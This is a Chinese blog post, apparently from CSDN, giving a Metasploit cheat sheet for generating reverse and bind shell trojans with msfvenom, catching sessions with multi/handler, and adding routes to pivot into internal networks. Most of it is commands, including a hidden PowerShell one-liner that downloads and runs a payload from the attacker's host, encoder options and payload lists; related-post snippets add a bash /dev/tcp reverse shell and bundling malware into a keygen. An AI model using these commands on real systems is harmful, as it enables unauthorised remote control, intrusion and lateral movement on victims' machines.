msf反弹shell内网渗透

最新推荐文章于 2024-05-30 15:16:41 发布
最新推荐文章于 2024-05-30 15:16:41 发布
阅读量1.8k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37964989/article/details/102582244
版权

用法示例:

1. msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection  -o xx.ps1   //生成文件放在目标机目录下
    //powershell执行脚本:powershell -windowstyle hidden -exec bypass IEX (New-Object  Net.WebClient).DownloadString('http://<yourip>/xxx.ps1');xxx.ps1
2. use exploit/multi/handler
3. set payload windows/x64/meterpreter/reverse_tcp
4. show options
5. set LHOST=XXX    RHOST=XXX
6. run
7. 目标主机执行木马文件

0x01 msfvenon生成木马文件:

格式:msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>
          // -e 常用编码    x86/shikata_ga_nai      cmd/powershell_base64
         // -f指指定的可执行文件类型   -o 指定输出地址。

反向连接:

linux:

  • msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1

windows:

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1
  • //生成64位系统木马:
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<本机ip地址> lport=<本机监听端口> -f psh-reflection  -o xx.ps1

正向连接:

linux:

  • msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1

windows:

  • msfvenom -p windows/meterpreter/bind_tcp LHOST=<本机ip地址> LPORT=<本机监听端口> -f psh-reflection  -o xx.ps1

0x02 启用exploit/multi/handler模块:

use exploit/multi/handler

0x03 设置PAYLOAD:

linux:

linux/x86/meterpreter/reverse_tcp  //反向payload
linux/x86/meterpreter/bind_tcp       //正向payload
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

windows:

windows/meterpreter/reverse_tcp    //反向payload
windows/meterpreter/bind_tcp         //正向payload
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

0x04 设置参数运行

set  .....

run

0x05 添加路由

route add <目标IP> <目标子网掩码>

示例:route add 10.0.0.1 255.0.0.0 1       //最后的1为添加该路由到session 1

OKAY_TC
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
msf生成linux elf木马反弹shell
shatianyzg的博客
06-13 1541
攻击机:Kali 192.168.241.128 靶机:centos 7 192.168.241.129 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=8888 -f elf > mshell.elf各参数解释: inux/x64/meterpreter/reverse_tcp //这是反弹的payload LHOST=xxx.xxx.xxx.xxx //这里写kali的ip LPORT //写k
使用msf进行反弹shell+内网渗透
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
【网络安全--反弹shell】注册机捆绑恶意程序上线MSF
最新发布
m0_67844671的博客
05-30 290
【网络安全--反弹shell】注册机捆绑恶意程序上线MSF 声明:郑重声明,本篇博客仅供学习与参考,若学习的内容用的不当,所产生的后果自负!!
php结合msf反弹内网shell
aiquan9342的博客
07-17 641
感谢: perl6大佬分享的姿势。 MSF: msf > use payload/php/bind_phpmsf exploit(handler) > set PAYLOAD payload/php/bind_phpmsf exploit(handler) > set RHOST 目标内网ipmsf payload(bind_php) > gen...
msf反弹php shell,msf反弹shell - osc_u4ki5b6h的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_34230075的博客
03-22 393
今天回顾了一下msf反弹shell的操作,在这里做一下记录和分享。( ̄︶ ̄)↗反弹shell的两种方法 第一种Msfvenom实例:1、msfconsole    #启动msf2、msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > shell.php    #生成反弹shell文件LHOST表示本地攻击机的ip,LPO...
msf--Linux反弹shell--一看就会的实验
lxlxxxlx的博客
09-22 2973
msf--Linux反弹shell--一看就会的实验
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
iis 6.0 CVE-2017-7269 Msf 反弹shell
01-23
iis 6.0 CVE-2017-7269 Msf 反弹shell metasploit漏洞测试利用模块
msf内网渗透
10-29
在IT安全领域,尤其是渗透测试和网络攻防中,“msf内网渗透”是一个关键话题,涉及到了Metasploit框架(简称MSF)在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...
内网渗透讲解与实验手册
05-16
- **基本信息:** 使用msf生成payload将msf用于内网渗透。 - **路径:** WinWeb服务器(192.168.20.162)。 - **使用工具:** msf。 **实验过程:** 1. **生成payload:** - 使用msfpayload生成Windows可执行exe...
浅谈MSF渗透测试
02-24
是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。前不久MSF从4.7升级到MSF5.0,其中改进了数据库的处理逻辑,优化了msfconsole终端操作,并将PostgreSQL作为一个RESTful服务单独运行。此外还加入一个Web服务...
linux反弹shell方法
weixin_53747497的博客
07-12 2073
被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。被控端攻击端参数解释bash -i : 打开一个交互式的bash shell/dev/tcp/IP/PORT : /dev/tcp/是Linux中的一个特殊设备文件(Linux一切皆文件),实际这个文件是不存在的,它只是 bash 实现的用来实现网络请求的一个接口。0>&1 : 将输入重定向到标准输出,为了确保命令执行后的输入被正确的传回攻击机。
云服务器msf跨域反弹shell
iuyoo的博客
03-29 5983
环境部署 服务器建议使用Ubuntu 16的。然后再在服务器上安装msf。如果是使用服务器记得在控制台将使用的端口开放,否则可能会监听不到会话。 生成木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=(公网ip) LPORT=(开放的端口) -f elf > mshell.elf 在/root目录下生成一个mshell.elf木马文件,此文件为linux系统木马 利用msf攻击 使用xftp将生成的木马上传进被攻击机内,这里放
反弹Shell的方式和详解
热门推荐
Kevin's Blog
06-18 1万+
文章目录一、介绍1.1 含义1.2 目的二、反弹方式2.1 Bash反弹shell2.1.1 适用对象2.1.2 操作方法2.1.3 命令原理 声明:以下的反弹shell的介绍只适用于学习和授权情况下的操作,请勿用于非法环境! 一、介绍 1.1 含义   攻击者所在机器连接目标机器为正向连接(如:远程桌面、ssh等),反向连接弹shell反弹shell为攻击者为服务端,受害者主机主动连接攻击者的服务端程序) 1.2 目的 攻击了一台主机需要在自己的机器上交互式地执行目标机器中的cmd/bash命令
msf常用命令
黑锤的博客
07-14 2007
msfvenom:生成payload工具 常用参数:-l查看列表 -p 指定payload -f指定输出格式 -e指定一个编码方式 -i 指定编码次数 例如生成一个反向tcp的payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.139.130 LPORT=4444 -e x86/shikata_ga_nai -I 5 -f exe > 1.exe 上面是生成Windows可执行文件,也可以生成Li...
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 2022
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
msf反弹shell
aixioxiaoxaio的博客
12-09 1602
1. 首先打开msf的payload模块。找到windows/x64/meterpreter_reverse_tcp,然后使用该payload。 再在新的终端使用下面的命令。 msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.1.5 lport=4444 -f exe -o abc.exe 2. 打开监测模块。 msf6 exploit(multi/handler) > set LHOST 192.168.1.5 ms
powershell对抗杀软
weixin_44216796的博客
01-16 371
知识点介绍: Windows PowerShell是以.NET Framework技术为基础,并且与现有的WSH保持向后兼容,因此它的脚本程序不仅能访问.NET CLR,也能使用现有的COM技术。同时也包含了数种系统管理工具、简易且一致的语法, 提升管理者处理,常见如登录数据库、WMl。Exchange Server 2007以及System Center Operations Manager 2007等服务器软件都将内置Windows PowerShell。 Windows PowerShell的强大,
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值